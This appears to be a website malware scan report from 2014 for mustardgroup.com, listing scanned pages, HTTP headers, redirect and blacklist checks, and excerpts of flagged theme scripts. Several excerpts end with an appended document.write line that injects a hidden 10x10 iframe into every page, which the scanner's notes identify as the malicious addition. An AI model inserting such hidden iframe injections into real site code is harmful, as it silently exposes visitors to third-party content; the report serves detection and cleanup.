Scanned pages/files
Request | Server response | Status |
http://mustardgroup.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 13 Aug 2014 01:18:24 GMT Pragma: no-cache Location: http://www.mustardgroup.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/ X-Pingback: http://www.mustardgroup.com/xmlrpc.php | clean |
http://www.mustardgroup.com/ | 200 OK Content-Length: 19400 Content-Type: text/html | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery-1.7.min.js?ver=3.4 | 200 OK Content-Length: 94157 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt (truncated by the scanner): (function(a,b){function cA(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cx(a){if(!cm[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cn||(cn=c.createElement("iframe"),cn.frameBorder=cn.width=cn.height=0),b.appendChild(cn);if(!co||!cn.createElement)co=(cn.contentWindow||cn.contentDocument).document,co.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),co.close();d=c
Note: the visible portion appears to be ordinary minified jQuery code (it builds a temporary iframe to probe an element's default display value), so the content that triggered the detection is not shown in this truncated excerpt.
Antivirus reports:
| ||
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery-ui.min.js?ver=3.4 | 200 OK Content-Length: 202012 Content-Type: text/javascript | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/preloader.js?ver=3.4 | 200 OK Content-Length: 2022 Content-Type: text/javascript | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.fancybox-1.3.4.js?ver=3.4 | 200 OK Content-Length: 29535 Content-Type: text/javascript | malicious |
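Malicious code - confirmed by antiviruses (see below). Excerpt (beginning and end of the file only): ;(function($) { var tmp, loading, overlay, wrap, outer, content, close, title, nav_left, nav_right, selectedIndex = 0, selectedOpts = {}, selectedArray = [], currentIndex = 0, currentOpts = {}, currentArray = [], ajaxLoader = null, imgPreloader = new Image(), imgRegExp = /\.(jpg|gif|png|bmp|jpeg)(.*)?$/i, swfRegExp = /[^\.]\.(swf)\s*$/i, loadingTimer, loadingFrame = 1, titleHeight = 0, titleStr = '', start_pos, final_pos, busy enableKeyboardNav : true, onStart : function(){}, onCancel : function(){}, onComplete : function(){}, onCleanup : function(){}, onClosed : function(){}, onError : function(){} }; $(document).ready(function() { $.fancybox.init(); }); })(jQuery); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');
Note: the flagged addition is the final document.write(...) statement, appended after the plugin's closing })(jQuery); it writes a 10x10 iframe into every page that loads this script, while the code before it appears to be the fancybox plugin itself. The identical statement ends the excerpts for jquery.nivo.slider.js, jquery.quicksand.js and comment-reply.js further down, so all four files should be compared against known-good copies.
Antivirus reports: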
| ||
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.twitter.js?ver=3.4 | 200 OK Content-Length: 3299 Content-Type: text/javascript | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.nivo.slider.js?ver=3.4 | 200 OK Content-Length: 25418 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var NivoSlider = function(element, options){ var settings = $.extend({}, $.fn.nivoSlider.defaults, options); var vars = { currentSlide: 0, currentImage: '', totalSlides: 0, randAnim: '', running: false, paused: false, stop: false }; var slider = $(element); < captionOpacity: 0.8, prevText: 'Prev', nextText: 'Next', beforeChange: function(){}, afterChange: function(){}, slideshowEnd: function(){}, lastSlide: function(){}, afterLoad: function(){} }; $.fn._reverse = [].reverse; })(jQuery); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.bgslider.js?ver=3.4 | 200 OK Content-Length: 1911 Content-Type: text/javascript | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.quicksand.js?ver=3.4 | 200 OK Content-Length: 14834 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($) { $.fn.quicksand = function (collection, customOptions) { var options = { duration: 750, easing: 'swing', attribute: 'data-id', adjustHeight: 'auto', useScaling: true, enhancement: function(c) {}, selector: '> *', dx: 0, dy: 0 }; $.extend(options, customOptions); if ($.browser.msi $dest.remove(); options.enhancement($sourceParent); for (i = 0; i < animationQueue.length; i++) { animationQueue[i].element.animate(animationQueue[i].animation, options.duration, options.easing, postCallback); } }); }; })(jQuery); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://www.mustardgroup.com/wp-content/themes/empire/js/farbtastic.js?ver=3.4 | 200 OK Content-Length: 7825 Content-Type: text/javascript | clean |
http://mustardgroup.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 13 Aug 2014 01:18:34 GMT Pragma: no-cache Location: http://www.mustardgroup.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 13 Aug 2014 01:18:34 GMT Set-Cookie: PHPSESSID=463734en5t70ubhairhgiesuu5; path=/ X-Pingback: http://www.mustardgroup.com/xmlrpc.php | clean |
http://www.mustardgroup.com/test404page.js | 404 Not Found Content-Length: 17450 Content-Type: text/html | clean |
http://www.mustardgroup.com/about-us/ | 200 OK Content-Length: 19427 Content-Type: text/html | clean |
http://www.mustardgroup.com/wp-includes/js/comment-reply.js?ver=3.4 | 200 OK Content-Length: 923 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://www.mustardgroup.com/management/ | 200 OK Content-Length: 20132 Content-Type: text/html | clean |
http://www.mustardgroup.com/mustard-group/ | 200 OK Content-Length: 17932 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mustardgroup.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:24 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: mustardgroup.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:24 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mustardgroup.com
Referer: http://www.google.com/search?q=mustardgroup.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mustardgroup.com
Referer: http://www.google.com/search?q=mustardgroup.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mustardgroup.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mustardgroup.com/
Result: mustardgroup.com is not infected or malware details are not published yet.
Result: mustardgroup.com is not infected or malware details are not published yet.